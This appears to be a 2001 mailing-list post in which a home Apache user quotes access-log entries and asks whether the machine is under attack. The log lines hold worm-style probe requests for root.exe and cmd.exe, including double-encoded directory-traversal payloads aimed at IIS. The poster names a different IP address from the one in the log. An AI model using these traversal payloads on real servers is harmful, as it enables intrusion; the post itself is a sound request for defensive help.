We just got our ADSL and now have a server running Apache on a potato box at home. DynDNS provides us with dynamic dns.
Today I found these lines in my acces.log: 213.133.35.205 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir HT TP/1.0" 404 210 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /MSADC/root.exe?/c+dir HTTP /1.0" 404 208 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /c/winnt/system32/cmd.exe?/ c+dir HTTP/1.0" 404 218 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /d/winnt/system32/cmd.exe?/ c+dir HTTP/1.0" 404 218 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /scripts/..%255c../winnt/sy stem32/cmd.exe?/c+dir HTTP/1.0" 404 232 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_vti_bin/..%255c../..%255c ../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_mem_bin/..%255c../..%255c ../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 and so on. To me it looks as if 213.145.168.244 is trying to execute some file giving him root access. Are someone trying to crack my machine? What should I do? -- Ole Sebastian Stein [EMAIL PROTECTED]
